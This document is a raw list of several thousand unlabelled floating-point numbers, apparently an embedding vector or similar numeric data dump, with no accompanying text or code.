-0.0032086351420730352, 0.009149300865828991, -0.02611941657960415, 0.06067510321736336, 0.025548992678523064, 0.008668944239616394, 0.048816289752721786, -0.009457030333578587, -0.02344742976129055, -0.009749747812747955, -0.030862942337989807, -0.019124215468764305, -0.00030983969918452203, -0.023147206753492355, -0.001899849739857018, 0.016257084906101227, -0.00857137143611908, -0.002499358030036092, -0.00923936814069748, 0.027905743569135666, 0.002386774169281125, 0.011933871544897556, 0.017638111487030983, -0.02786071039736271, 0.03989965841174126, -0.03530624508857727, -0.0167374424636364, 0.009134289808571339, -0.06538860499858856, 0.01191885955631733, -0.02464832179248333, -0.009584625251591206, -0.011491041630506516, 0.009794780984520912, -0.024663332849740982, 0.04770546406507492, 0.019319361075758934, 0.015701672062277794, 0.0004393109411466867, -0.017232811078429222, 0.036266960203647614, 0.03143336623907089, 0.0005507218884304166, 0.0115510867908597, -0.02265183813869953, -0.022261548787355423, 0.005996957886964083, -0.036266960203647614, 0.010507810860872269, -0.002332358853891492, 0.028100889176130295, -0.0011999545386061072, 0.025624047964811325, 0.0026757391169667244, 0.012699440121650696, 0.0036964977625757456, 0.02323727309703827, 0.0020190009381622076, 0.02538386918604374, -0.009854825213551521, -0.004326966591179371, 0.022606804966926575, 0.0016127614071592689, 0.02518872357904911, -0.01948448456823826, 0.019604573026299477, 0.011333424597978592, -0.04296193644404411, -0.02370261959731579, 0.008331192657351494, 0.039359256625175476, 0.01994982920587063, -0.03254419192671776, 0.0157316941767931, -0.008653933182358742, 0.0026288290973752737, -0.040560152381658554, 0.0278006661683321, -0.015318887308239937, 0.024933533743023872, -0.002077169017866254, -0.0025631552562117577, -0.027695586904883385, -0.015071203000843525, 0.023627564311027527, -0.026284538209438324, -0.021135712042450905, 0.01903414912521839, 0.0004798879672307521, 0.00857137143611908, -0.012751979753375053, -0.02035513147711754, 0.0020077424123883247, 0.029962273314595222, 0.018463725224137306, 0.02472337894141674, -0.01741294376552105, -0.006905132904648781, -0.029166681692004204, -0.015461493283510208, 0.038428567349910736, 0.0012327914591878653, -0.024408144876360893, -0.0008171699591912329, -0.02412293292582035, -0.004465819802135229, -0.02203638106584549, -0.0328444167971611, -0.00532520841807127, -0.00587686849758029, -0.023282306268811226, -0.0003492439864203334, -0.002771435072645545, -0.03137332201004028, 0.026689840480685234, 0.04683481529355049, -0.02605937235057354, -0.004214382730424404, 0.022877005860209465, 0.02900155819952488, 0.004736020695418119, -0.0314934104681015, 0.009209346026182175, -0.0278006661683321, 0.020685376599431038, 0.0033793870825320482, 0.009021705947816372, -0.032123878598213196, 0.011746231466531754, 0.043502338230609894, -0.035876668989658356, -0.02050524204969406, 0.01990479603409767, -0.03590669110417366, 0.04389262944459915, 0.004518358968198299, 0.007985936477780342, 0.03308459371328354, -0.03197376802563667, -0.010973157361149788, -0.015243832021951675, 0.010365204885601997, 0.03812834247946739, -0.03518615663051605, -0.0024205492809414864, -0.0026513459160923958, -0.01903414912521839, -0.0020903039257973433, 0.0015123742632567883, -0.008774022571742535, 0.011476030573248863, 0.0009926129132509232, 0.014996147714555264, 0.005719251465052366, 0.010890595614910126, -0.017037665471434593, 0.014140511862933636, -0.02658476121723652, 0.009014200419187546, -0.0055166007950901985, 0.040289949625730515, -0.00994489248842001, 0.015026169829070568, -0.008811550214886665, 0.027080129832029343, -0.0012271621963009238, 0.01907918229699135, 0.012676923535764217, 0.014050444588065147, 0.001587430015206337, -0.0009274081676267087, 0.0039291707798838615, -0.011843804270029068, 0.030862942337989807, 0.037888165563344955, -0.0535898357629776, 0.01547650434076786, -0.02578917145729065, -0.008060991764068604, -0.009877342730760574, -0.0036721047945320606, 0.00907424557954073, -0.004278180189430714, -0.010312666185200214, -0.01279701292514801, 0.005434039514511824, 0.05166840925812721, 0.008796539157629013, -0.0015846154419705272, 0.029647039249539375, -0.0034976000897586346, -0.01874893717467785, 0.00008174045069608837, -0.007955914363265038, 0.0021015622187405825, -0.015281359665095806, 0.0005586965708062053, -0.004852356854826212, -0.003251792164519429, -0.01082304585725069, -0.011453513987362385, 0.0077007245272397995, -0.005475319921970367, -0.03329474851489067, 0.008188586682081223, -0.00422188825905323, 0.01669240929186344, -0.010079992935061455, -0.028521200641989708, 0.00911177322268486, 0.030052339658141136, -0.016722431406378746, 0.012782001867890358, 0.018118469044566154, 0.011941377073526382, -0.009577118791639805, -0.035066068172454834, -0.051218073815107346, -0.020730409771203995, 0.012331666424870491, -0.007396748289465904, 0.022892016917467117, 0.018448714166879654, 0.02632957324385643, -0.012031443417072296, -0.009854825213551521, 0.03563649207353592, -0.007708230055868626, 0.04992711544036865, -0.017788223922252655, 0.030562719330191612, -0.00483734579756856, -0.03671729564666748, 0.037077561020851135, -0.011363446712493896, -0.028911491855978966, 0.006946413777768612, -0.00917932391166687, -0.009321929886937141, -0.01044776663184166, -0.02358253113925457, 0.0010151296155527234, -0.008631416596472263, 0.015086214058101177, -0.0003058523579966277, 0.0009095824207179248, 0.007918385788798332, -0.013690176419913769, -0.02847616747021675, -0.01895909383893013, -0.00863892212510109, -0.02317722886800766, 0.020805465057492256, -0.01721779815852642, 0.007655690889805555, 0.016437219455838203, -0.039419300854206085, -0.007460545748472214, 0.01588180661201477, -0.028175944462418556, -0.007265400607138872, 0.0035013528540730476, -0.007325445301830769, 0.0022629322484135628, 0.0012402969878166914, -0.01741294376552105, -0.0024318078067153692, 0.02278693951666355, -0.019784707576036453, 0.010372710414230824, 0.0010939381318166852, -0.008563865907490253, 0.026629796251654625, 0.015221314504742622, -0.018583813682198524, 0.004690987057983875, 0.016452230513095856, 0.015971872955560684, 0.00571174593642354, -0.009637163951992989, -0.0037621716037392616, 0.03254419192671776, 0.0072278729639947414, -0.0220964252948761, -0.011798771098256111, 0.015896817669272423, -0.02807086706161499, -0.005794307217001915, -0.005216377787292004, -0.00637974264100194, -0.02526378072798252, -0.019244305789470673, 0.008383732289075851, -0.03509609028697014, -0.02263682708144188, -0.02499357983469963, 0.01158861443400383, 0.0007017716416157782, 0.00884157232940197, 0.008166070096194744, 0.03383515030145645, -0.003921665251255035, -0.010973157361149788, -0.006083271931856871, -0.016512274742126465, 0.03200379014015198, -0.011213335208594799, 0.025579014793038368, -0.018538780510425568, 0.012369194999337196, 0.036867406219244, 0.03632700443267822, -0.0033775107003748417, -0.01356258150190115, 0.003441308159381151, -0.017322877421975136, -0.02056528814136982, 0.04260166734457016, 0.05779296159744263, -0.003152343211695552, 0.012609372846782207, 0.03779809921979904, -0.0009161497582681477, -0.007618163246661425, -0.006679965648800135, -0.04533369839191437, 0.019304350018501282, -0.011438502930104733, 0.01613699644804001, -0.004871121142059565, -0.010057476349174976, -0.003985462710261345, 0.01004997082054615, 0.012346678413450718, -0.010545339435338974, 0.015491515398025513, 0.043502338230609894, -0.003313713241368532, -0.012316655367612839, 0.024708367884159088, 0.0008007514989003539, 0.010860573500394821, 0.03320468217134476, 0.009689702652394772, -0.027245253324508667, 0.008113531395792961, -0.0032743089832365513, 0.012744473293423653, -0.01225661113858223, -0.00923936814069748, -0.007940903306007385, -0.036537159234285355, 0.016632363200187683, 0.010395227000117302, -0.017097709700465202, -0.04797566309571266, 0.03830847516655922, 0.00549408420920372, -0.024092908948659897, 0.012346678413450718, -0.0002214145933976397, 0.006259653251618147, -0.017578067258000374, 0.00911177322268486, 0.011145785450935364, 0.01487605832517147, -0.02002488635480404, 0.009156806394457817, 0.038218408823013306, 0.024933533743023872, 0.0542503260076046, -0.02296707220375538, -0.026089394465088844, -0.01567164994776249, -0.009494557976722717, -0.0442228727042675, -0.007629421539604664, 0.018523769453167915, -0.003233028342947364, -0.0012327914591878653, -0.02364257536828518, 0.0227719284594059, -0.028085878118872643, -0.009059234522283077, -0.006818818859755993, -0.01996484026312828, 0.005486578680574894, -0.02987220510840416, -0.006229630671441555, 0.01487605832517147, -0.019214283674955368, 0.013202314265072346, 0.021871257573366165, -0.0482158400118351, -0.00927689578384161, -0.01961958408355713, 0.01480850763618946, -0.006135811097919941, -0.0071415589191019535, -0.018583813682198524, -0.022021370008587837, 0.009637163951992989, 0.016722431406378746, -0.00834620464593172, -0.010620394721627235, 0.028821425512433052, 0.002467459300532937, 0.00559540931135416, 0.010875584557652473, 0.01741294376552105, -0.04761539399623871, 0.01594185084104538, 0.015416460111737251, -0.03095300868153572, -0.010335182771086693, 0.0016155759803950787, 0.002499358030036092, -0.016647374257445335, -0.032454125583171844, -0.004296944011002779, -0.057102449238300323, 0.039419300854206085, 0.037738051265478134, 0.019259316846728325, 0.029496926814317703, 0.0214359350502491, 0.005437792278826237, 0.006214619614183903, -0.008751505054533482, 0.012804518453776836, -0.011806276626884937, 0.005193860735744238, -0.020610321313142776, -0.0194244384765625, -0.016302118077874184, 0.004807323683053255, 0.028896480798721313, 0.011003179475665092, -0.012571845203638077, -0.010440261103212833, -0.016932586207985878, -0.042781803756952286, 0.00014026051212567836, -0.013164786621928215, -0.020790454000234604, -0.011783759109675884, 0.028926502913236618, -0.004499594680964947, -0.003857867792248726, 0.05854351818561554, -0.008323687128722668, -0.030172428116202354, -0.03959943726658821, 0.008496316149830818, -0.0009316300274804235, -0.024888500571250916, -0.03926919028162956, -0.007265400607138872, -0.032934483140707016, 0.028926502913236618, -0.014740957878530025, 0.004949929658323526, 0.0024355605710297823, -0.029046591371297836, 0.011003179475665092, 0.002448695246130228, 0.0207604318857193, -0.004477078095078468, -0.019574550911784172, -0.0157316941767931, -0.024828456342220306, -0.0038466094993054867, 0.012369194999337196, -0.01955953985452652, 0.008661438710987568, 0.0018097828142344952, 0.013817771337926388, 0.006766279693692923, -0.0017384798265993595, 0.005471567157655954, -0.003880384610965848, -0.00406802399083972, 0.02544391341507435, -0.013037191703915596, 0.035006020218133926, -0.0328143946826458, -0.029827171936631203, -0.018733926117420197, 0.0013425605138763785, 0.003007860854268074, 0.011370952241122723, -0.009832308627665043, 0.013187303207814693, 0.03689742833375931, -0.01862884871661663, -0.018703904002904892, -0.012444250285625458, 0.013870310969650745, -0.022621816024184227, 0.023597542196512222, -0.0005024046986363828, 0.027485432103276253, 0.002172865206375718, 0.0038203399162739515, 0.0022460445761680603, -0.015416460111737251, 0.018854014575481415, 0.017968356609344482, -0.001263751881197095, 0.009704713709652424, -0.016317129135131836, -0.0069764358922839165, 0.0028746367897838354, 0.009937386959791183, -0.023612553253769875, -0.030712829902768135, -0.03710758313536644, 0.008466293103992939, -0.02050524204969406, -0.0025443914346396923, -0.012511800974607468, -0.008691460825502872, 0.008068498224020004, -0.007580635137856007, -0.0025988067500293255, -0.0314934104681015, -0.004334472119808197, 0.003807205008342862, 0.01849374733865261, 0.006694976706057787, -0.0200999416410923, 0.020340120419859886, 0.01915423758327961, -0.0034919707104563713, 0.004315708298236132, 0.03308459371328354, 0.008751505054533482, -0.03488593176007271, 0.006942661013454199, 0.003096051514148712, -0.0036458352115005255, 0.0009719725348986685, 0.01720278710126877, -0.03140334412455559, 0.007385489996522665, 0.01627209596335888, -0.010004937648773193, -0.020415175706148148, -0.004818581975996494, -0.0035144875291734934, -0.00021730997832491994, -0.010800528340041637, -0.010778011754155159, -0.02451322227716446, -0.048275887966156006, -0.019334372133016586, 0.00917932391166687, 0.047255128622055054, 0.004341977648437023, 0.004274427425116301, -0.0036101837176829576, -0.006882616318762302, -0.018463725224137306, -0.009036717936396599, -0.01059037260711193, 0.010245115496218204, -0.013389953412115574, 0.0066987294703722, 0.010635405778884888, 0.035336267203092575, -0.024558255448937416, 0.041160598397254944, -0.017127731814980507, 0.004236899316310883, -0.018538780510425568, 0.012211577966809273, 0.03806829825043678, 0.014448240399360657, -0.019784707576036453, 0.005816823802888393, 0.0044845836237072945, 0.005786801688373089, -0.016227062791585922, -0.014260600320994854, 0.03221394494175911, -0.007505579385906458, 0.009269390255212784, 0.0016193287447094917, 0.004113057628273964, -0.007873352617025375, 0.010019948706030846, -0.005572892725467682, -0.001092999940738082, -0.015266348607838154, 0.016572318971157074, 0.009427007287740707, 0.00911177322268486, 0.019979851320385933, -0.04092041775584221, -0.004803570918738842, -0.004150585271418095, -0.006282169837504625, -0.012556834146380424, -0.007595646195113659, 0.017232811078429222, -0.005366489291191101, -0.010627900250256062, -0.02497856877744198, 0.00878152810037136, -0.017668133601546288, 0.005246399901807308, 0.010237609967589378, -0.006526101380586624, -0.01209148857742548, 0.09228860586881638, -0.009081751108169556, -0.008796539157629013, 0.010597878135740757, -0.040560152381658554, -0.0018407433526590466, 0.028521200641989708, -0.021285822615027428, 0.008548854850232601, -0.0006393815274350345, 0.01245926134288311, 0.03623693808913231, 0.023672597482800484, 0.023762663826346397, 0.030697818845510483, 0.019679628312587738, -0.0012918978463858366, -0.011063223704695702, 0.00373402563855052, -0.006413517519831657, 0.012706945650279522, 0.02511366829276085, 0.01615200750529766, 0.010913112200796604, 0.02037014253437519, -0.00994489248842001, -0.020280076190829277, -0.018433703109622, 0.0050812773406505585, -0.0048298402689397335, -0.024212999269366264, 0.012331666424870491, -0.0031879949383437634, -0.014478262513875961, -0.026644807308912277, 0.005955677013844252, 0.025458924472332, 0.019304350018501282, -0.015318887308239937, -0.01714274287223816, -0.0003984993672929704, -0.0025669080205261707, -0.022081414237618446, -0.012061466462910175, -0.009892353788018227, 0.0069801886565983295, -0.0034000275190919638, 0.040289949625730515, -0.02224653773009777, 0.00577554339542985, 0.0005366489058360457, -0.026029348373413086, 0.003353117499500513, 0.0007613471825607121, -0.009457030333578587, -0.01248928438872099, -0.024393131956458092, -0.0006088901427574456, 0.008563865907490253, 0.01588180661201477, -0.007580635137856007, -0.010702956467866898, -0.026614785194396973, -0.01756305620074272, -0.0019458214519545436, 0.0030566472560167313, -0.027095140889286995, -0.009577118791639805, -0.03254419192671776, 0.008661438710987568, 0.009704713709652424, 0.013750221580266953, 0.02062533237040043, 0.007651938125491142, 0.006661201827228069, -0.005632937420159578, 0.00544154504314065, 0.008451282046735287, 0.02250172756612301, -0.015566571615636349, -0.0005737077444791794, 0.007179086562246084, -0.02611941657960415, 0.0027001320850104094, -0.004086787812411785, 0.021676113829016685, -0.023132195696234703, 0.005779296159744263, -0.0011070729233324528, -0.0019533270969986916, -0.02190127968788147, 0.012932113371789455, 0.01934938319027424, -0.0030416359659284353, 0.0037621716037392616, 0.006278417073190212, 0.015296370722353458, 0.001714086625725031, -0.01822354644536972, -0.01714274287223816, 0.008451282046735287, -0.01225661113858223, 0.001478599151596427, -0.013495031744241714, -0.03383515030145645, 0.0032123879063874483, 0.016662385314702988, -0.012872068211436272, 0.005854351911693811, 0.015536549501121044, 0.007681960240006447, 0.006499831564724445, 0.025368858128786087, 0.005756779573857784, 0.014763474464416504, -0.0009358519455417991, 0.009832308627665043, -0.01729285530745983, -0.011078234761953354, -0.01955953985452652, -0.02116573415696621, 0.015101226046681404, 0.0002512023493181914, -0.04914653301239014, 0.012932113371789455, 0.023417407646775246, 0.017427954822778702, 0.007089019753038883, -0.0037846884224563837, 0.000808257085736841, 0.023762663826346397, 0.013517548330128193, 0.01667739637196064, 0.02960200421512127, -0.004188113380223513, -0.0073179397732019424, 0.01025262102484703, 0.0014898574445396662, -0.009254379197955132, 0.007805802393704653, -0.012151532806456089, 0.005227636080235243, -0.0028033338021486998, 0.015626616775989532, 0.007760769221931696, -0.020550277084112167, 0.0025744137819856405, 0.00784333050251007, -0.005242647137492895, -0.004251910839229822, -0.01061288919299841, -0.023942798376083374, 0.03095300868153572, 0.005580398254096508, -0.012969641014933586, -0.04734519496560097, -0.01433565653860569, -0.038818854838609695, 0.02217148058116436, 0.011791265569627285, -0.006792549509555101, -0.006845088209956884, -0.001609008526429534, -0.04010981693863869, -0.02727527543902397, -0.006773785222321749, -0.008653933182358742, -0.007242884021252394, -0.01868889294564724, -0.00139885232783854, 0.034675776958465576, -0.01754804514348507, 0.018343636766076088, 0.021886268630623817, 0.023672597482800484, 0.04119062051177025, 0.02035513147711754, -0.010132532566785812, 0.00642852857708931, -0.020445197820663452, 0.01125836931169033, -0.008488810621201992, 0.01356258150190115, 0.010537832975387573, -0.012444250285625458, -0.01949949562549591, -0.014020422473549843, 0.0005389944417402148, -0.03095300868153572, 0.003084793221205473, -0.0041768550872802734, 0.018268579617142677, 0.009667186066508293, -0.01795334555208683, -0.0073592206463217735, -0.006837582681328058, 0.01059037260711193, -0.03368503972887993, 0.0014185544569045305, -0.02538386918604374, -0.004585909191519022, -0.007167828269302845, 0.0009485175833106041, -0.021060654893517494, 0.005741768050938845, -0.030772875994443893, -0.018208535388112068, 0.012511800974607468, 0.012226589024066925, 0.016827508807182312, -0.0065823933109641075, -0.03899899125099182, -0.012391711585223675, -0.010515316389501095, 0.013007168658077717, 0.013525053858757019, -0.012046454474329948, -0.02391277626156807, -0.0027339071966707706, 0.014710935764014721, 0.005888126790523529, 0.009494557976722717, -0.01523632649332285, 0.014650890603661537, 0.010597878135740757, 0.006150822155177593, 0.014283117838203907, -0.01574670523405075, -0.0006154574803076684, 0.017848268151283264, -0.005077524576336145, -0.012406722642481327, 0.019604573026299477, 0.006229630671441555, -0.004814829211682081, -0.014425723813474178, -0.009059234522283077, -0.006409764755517244, 0.02452823333442211, 0.00977976992726326, 0.0066349320113658905, 0.01934938319027424, 0.011723714880645275, -0.0013819647720083594, 0.010808033868670464, -0.0003107778902631253, -0.0016446600202471018, 0.028115900233387947, -0.011393469758331776, -0.011701198294758797, 0.004417033400386572, 0.029226725921034813, 0.011806276626884937, -0.03356495127081871, -0.0012290385784581304, -0.017638111487030983, 0.0056441957131028175, 0.000058989164244849235, -0.003996721003204584, -0.032724324613809586, 0.026239505037665367, -0.011558592319488525, 0.01048529427498579, 0.0028464910574257374, -0.00026175708626396954, -0.010170060209929943, -0.03242410346865654, -0.012301644310355186, -0.005704240407794714, 0.005846846383064985, -0.009404490701854229, 0.0026175708044320345, 0.0030059844721108675, -0.0033737579360604286, 0.0016718677943572402, -0.03440557420253754, 0.007423018105328083, 0.016091961413621902, -0.015183786861598492, 0.01601690612733364, 0.01720278710126877, -0.0008753382135182619, 0.017457976937294006, -0.03863872215151787, -0.008759011514484882, 0.014042939059436321, -0.016917575150728226, 0.010672933422029018, -0.004934918601065874, -0.01158861443400383, 0.014575835317373276, -0.015086214058101177, -0.0009944892954081297, -0.030922986567020416, -0.0045221117325127125, 0.017187776044011116, -0.01356258150190115, 0.011941377073526382, 0.026704851537942886, -0.01613699644804001, -0.004210629966109991, 0.0007397686713375151, 0.02182622440159321, -0.006920143961906433, -0.01248928438872099, -0.010230104438960552, -0.03623693808913231, -0.016197040677070618, 0.025218745693564415, 0.025894248858094215, -0.02137589082121849, -0.0035482626408338547, -0.03497599810361862, 0.010102509520947933, -0.004537122789770365, -0.021330855786800385, -0.00653360690921545, 0.025458924472332, -0.02157103456556797, -0.023132195696234703, 0.015896817669272423, -0.005062513053417206, 0.009396985173225403, -0.01816350221633911, -0.016091961413621902, -0.029977284371852875, -0.03692745044827461, -0.007546860259026289, -0.005809318274259567, 0.0044845836237072945, 0.005340219475328922, 0.009389479644596577, 0.02149597927927971, 0.00219538202509284, 0.0019026643130928278, 0.021661102771759033, 0.02136087790131569, -0.02900155819952488, -0.025639059022068977, -0.01011001504957676, -0.029887216165661812, 0.04788559675216675, -0.011836298741400242, 0.0071378061547875404, 0.005445297807455063, -0.03716762736439705, 0.027575498446822166, 0.007167828269302845, -0.01615200750529766, -0.005452803336083889, -0.029301781207323074, -0.00019866329967044294, 0.008901617489755154, -0.008698966354131699, 0.009637163951992989, 0.022276559844613075, 0.012842046096920967, 0.0017206540796905756, 0.007614410016685724, -0.025894248858094215, 0.022411659359931946, 0.006026980001479387, 0.003356870263814926, -0.01936439424753189, -0.0022591794840991497, -0.03095300868153572, -0.012676923535764217, -0.013825276866555214, 0.008045980706810951, -0.00944952480494976, 0.00708526698872447, 0.006953919306397438, 0.02083548903465271, -0.006342214532196522, 0.02832605689764023, 0.010297655127942562, 0.02452823333442211, -0.04542376473546028, -0.00880404468625784, 0.03923916816711426, -0.004034249112010002, -0.032334037125110626, 0.009051728993654251, -0.029121648520231247, 0.005238894373178482, -0.006439786870032549, -0.010064981877803802, 0.009967409074306488, -0.018944082781672478, 0.03155345469713211, 0.02814592234790325, 0.037948209792375565, 0.010522821918129921, 0.01493610255420208, -0.0009832308860495687, -0.01915423758327961, -0.014200556091964245, -0.0006923896726220846, -0.008728988468647003, -0.008113531395792961, -0.023687608540058136, 0.008211104199290276, 0.0011605501640588045, 0.017067687585949898, 0.024798434227705002, 0.000862672517541796, 0.002677615499123931, -0.0334748849272728, 0.005347725469619036, -0.00691639119759202, -0.002441189717501402, 0.01760808937251568, -0.013555075973272324, -0.003116691717877984, -0.0031560962088406086, -0.029887216165661812, 0.01071796752512455, 0.05196863040328026, -0.0005174158723093569, -0.015221314504742622, -0.0157316941767931, -0.0008692399132996798, -0.006679965648800135, 0.005880621261894703, -0.0019064171938225627, -0.01648225262761116, -0.017728177830576897, -0.022877005860209465, -0.004822334740310907, 0.0258041825145483, -0.017803234979510307, 0.010335182771086693, -0.010395227000117302, -0.0014363802038133144, -0.007043986115604639, -0.005400264170020819, -0.004405775107443333, 0.02499357983469963, -0.0014739081962034106, 0.013532559387385845, -0.02070038765668869, -0.014163028448820114, -0.003940429072827101, 0.008894111961126328, -0.006552370730787516, 0.004675976000726223, -0.014598351903259754, -0.02062533237040043, 0.0002577697450760752, -0.012399217113852501, 0.018208535388112068, -0.01115329097956419, 0.024348098784685135, 0.006601157132536173, -0.0034450609236955643, -0.014703430235385895, 0.0039629461243748665, 0.003341859206557274, -0.008263642899692059, -0.008939145132899284, 0.02859625779092312, -0.0016043175710365176, -0.020520253106951714, -0.001703766523860395, 0.00878152810037136, 0.014583340846002102, 0.0018660746281966567, 0.00725038954988122, -0.0020903039257973433, -0.009254379197955132, 0.012646901421248913, -0.004848604090511799, -0.006878863554447889, 0.002600683132186532, 0.023327341303229332, -0.009727231226861477, -0.005726756993681192, -0.01822354644536972, -0.00028919934993609786, 0.021871257573366165, 0.011025696061551571, 0.015461493283510208, -0.017638111487030983, -0.014793496578931808, -0.020955577492713928, 0.021556023508310318, -0.00844377651810646, -0.0008124789455905557, -0.017112720757722855, 0.020580299198627472, 0.0015930591616779566, -0.012887079268693924, 0.008894111961126328, 0.019544528797268867, -0.004311955533921719, 0.0077007245272397995, 0.012399217113852501, 0.012616879306733608, -0.0031035570427775383, 0.004600920248776674, -0.01874893717467785, 0.00045549485366791487, -0.00800845306366682, 0.00974224228411913, 0.011408480815589428, 0.003283690894022584, -0.018448714166879654, -0.005873115733265877, -0.004071776755154133, 0.0028277270030230284, 0.018193524330854416, -0.0014588970225304365, -0.010958146303892136, -0.021541012451052666, 0.004848604090511799, 0.004552133847028017, 0.0009316300274804235, -0.020985599607229233, -0.02371763065457344, 0.010747989639639854, 0.013960377313196659, -0.000624839507509023, -0.005336466711014509, -0.015086214058101177, -0.0023736394941806793, 0.013615121133625507, 0.007460545748472214, -0.00797092542052269, -0.006657449062913656, -0.01386280544102192, -0.003936676308512688, 0.004799818154424429, 0.0015377055387943983, -0.007182839326560497, -0.008759011514484882, -0.012136521749198437, 0.022156469523906708, -0.009952398017048836, -0.003621442010626197, 0.006499831564724445, 0.0026138180401176214, -0.021676113829016685, 0.009914870373904705, 0.013997905887663364, -0.0026757391169667244, -0.00041655966197140515, 0.015521538443863392, -0.01735289953649044, 0.0030641527846455574, 0.016332140192389488, 0.0011943252757191658, -0.012474273331463337, -0.0005769914132542908, 0.022486716508865356, -0.01343498658388853, -0.018808981403708458, -0.007381737232208252, -0.003647711593657732, 0.005576645489782095, 0.006649943068623543, 0.024498211219906807, 0.03287443891167641, 0.014238083735108376, -0.024288054555654526, -0.006556123495101929, 0.012894585728645325, -0.004432044457644224, -0.0028108395636081696, 0.0001570307940710336, -0.007835824973881245, 0.004766042809933424, -0.014748463407158852, -0.006950166542083025, -0.0076669491827487946, -0.0016193287447094917, -0.008248631842434406, -0.001049842918291688, 0.003632700303569436, 0.016302118077874184, 0.012947124429047108, -0.007918385788798332, 0.009336940944194794, -0.005197613500058651, -0.0024787175934761763, -0.021691124886274338, 0.008038475178182125, 0.017097709700465202, 0.013787749223411083, -0.000977601739577949, -0.012249105609953403, 0.014718441292643547, 0.00576428510248661, -0.004781053867191076, 0.024543244391679764, -0.01642220839858055, -0.003643958829343319, -0.011108257807791233, 0.005704240407794714, 0.0007444596267305315, 0.010943134315311909, 0.01747298799455166, 0.022066403180360794, 0.010260126553475857, 0.011018190532922745, -0.02197633683681488, -0.021390901878476143, -0.017367910593748093, -0.023162217810750008, -0.0017412943998351693, -0.002343617146834731, -0.005039996467530727, -0.009336940944194794, -0.003869126085191965, 0.0062408894300460815, -0.0013266111491248012, -0.004949929658323526, 0.00018142392218578607, -0.005584151018410921, 0.0004794188716914505, -0.02015998587012291, -0.0040530129335820675, -0.007479310035705566, 0.029827171936631203, -0.00621086684986949, -0.007111536338925362, 0.02064034342765808, 0.010027454234659672, -0.018944082781672478, -0.008091014809906483, 0.015401449054479599, 0.002869007643312216, -0.009366963058710098, -0.010034959763288498, 0.012068971991539001, -0.004165596328675747, 0.017698155716061592, -0.020460208877921104, 0.0069764358922839165, -0.03128325566649437, -0.019319361075758934, -0.02015998587012291, -0.00532520841807127, -0.04836595430970192, 0.00001946759584825486, -0.014215567149221897, -0.01500365324318409, -0.00813604798167944, -0.00857137143611908, 0.013329909183084965, 0.02464832179248333, -0.0008152935770340264, -0.0012524935882538557, -0.01574670523405075, -0.0051750969141721725, -0.0017703785561025143, -0.012016432359814644, 0.007910880260169506, -0.01669240929186344, 0.004754784516990185, -0.0012834540102630854, -0.005163838621228933, 0.015258843079209328, -0.012834540568292141, -0.006248394958674908, 0.005790554452687502, -0.033865172415971756, -0.03863872215151787, -0.0001264221064047888, -0.010019948706030846, 0.012654406949877739, 0.008789033629000187, 0.0025950539857149124, -0.003563273698091507, -0.003088545985519886, -0.008713977411389351, -0.009592130780220032, 0.022831972688436508, 0.005362736526876688, 0.0002333766024094075, -0.005689229350537062, -0.012279127724468708, 0.011768748052418232, -0.0059519242495298386, 0.0017262832261621952, -0.0009297536453232169, 0.003690868616104126, 0.010335182771086693, 0.00659740436822176, -0.0031185683328658342, -0.008533843792974949, -0.006083271931856871, 0.016647374257445335, 0.013840287923812866, -0.009246873669326305, -0.019919807091355324, -0.03926919028162956, -0.01182128768414259, 0.011108257807791233, -0.006781290750950575, -0.0011502300621941686, 0.013855299912393093, 0.008871594443917274, -0.004552133847028017, 0.017307866364717484, 0.007062749937176704, -0.0013172291219234467, 0.003116691717877984, -0.010492799803614616, 0.009051728993654251, -0.007171581033617258, 0.0108830900862813, 0.001849187072366476, 0.01607695035636425, 0.01574670523405075, -0.012121510691940784, 0.020475219935178757, -0.005978194065392017, 0.012286633253097534, 0.014148017391562462, 0.0024149201344698668, -0.013352425768971443, -0.007940903306007385, -0.025203734636306763, -0.01379525475203991, -0.013074719347059727, 0.011175807565450668, 0.00015878991689532995, 0.0057342625223100185, -0.009824803099036217, 0.008864088915288448, 0.016767464578151703, 0.005347725469619036, 0.014343162067234516, -0.0033700051717460155, -0.00002267799027322326, -0.013104741461575031, 0.005411522928625345, -0.03797823190689087, -0.0055128480307757854, 0.0023961563128978014, 0.010725473053753376, 0.011536075733602047, -0.014590846374630928, 0.005287680774927139, -0.005651701241731644, 0.0004524457035586238, -0.013772738166153431, 0.004428291693329811, 0.022591793909668922, 0.014545813202857971, 0.012376700527966022, 0.005719251465052366, -0.002553773345425725, -0.008849077858030796, 0.020610321313142776, -0.0021634832955896854, -0.01928933896124363, 0.007569376844912767, 0.002491852268576622, -0.000025389967049704865, 0.027095140889286995, -0.011663670651614666, 0.01011001504957676, -0.008976672776043415, 0.024618299677968025, 0.00499121006578207, -0.00911177322268486, 0.013802760280668736, -0.02064034342765808, -0.023087162524461746, -0.0217661801725626, -0.000670342065859586, 0.02137589082121849, 0.004856109619140625, 0.017863279208540916, 0.015866795554757118, -0.0014363802038133144, -0.000485048076370731, -0.0002006569702643901, -0.005122557748109102, 0.0024430660996586084, -0.00824112631380558, -0.010597878135740757, 0.000966343330219388, 0.012196565978229046, -0.00790337473154068, -0.004754784516990185, -0.007655690889805555, 0.020925555378198624, -0.012376700527966022, -0.02693001925945282, 0.004131821449846029, 0.026975052431225777, -0.0023117184173315763, -0.014823519624769688, -0.003865373320877552, 0.018133480101823807, -0.003604554571211338, 0.012181554920971394, -0.012204072438180447, 0.010072487406432629, -0.03122320957481861, 0.00039427747833542526, -0.01994982920587063, 0.02056528814136982, 0.002495605032891035, 0.008271148428320885, 0.004105552099645138, -0.0015733570326119661, 0.0050437492318451405, -0.018643859773874283, -0.029797149822115898, 0.0028014574199914932, -0.009494557976722717, 0.0014110489282757044, 0.01888403855264187, -0.022201504558324814, 0.00017837478662841022, 0.007362973410636187, -0.0008593888487666845, -0.008601393550634384, -0.013254852965474129, 0.02472337894141674, 0.005497836973518133, 0.007978430949151516, -0.032664280384778976, -0.004623436834663153, -0.019844751805067062, 0.021090678870677948, 0.0033343536779284477, -0.009862331673502922, -0.014748463407158852, 0.002064034342765808, -0.035606469959020615, -0.028115900233387947, -0.02458827756345272, -0.004435797221958637, 0.006364731118083, 0.00917932391166687, 0.01044776663184166, -0.005475319921970367, -0.004604673013091087, -0.002216022228822112, 0.007280412130057812, -0.0012055836850777268, -0.018343636766076088, -0.0042331465519964695, -0.00867644976824522, -0.0064547983929514885, -0.047795530408620834, 0.018328623846173286, -0.028040844947099686, -0.012714451178908348, 0.0047022453509271145, 0.017127731814980507, 0.004679728765040636, -0.0024299314245581627, -0.009734736755490303, -0.022952061146497726, -0.005903138313442469, 0.006102036219090223, 0.01111576333642006, 0.01075549516826868, 0.01527385413646698, 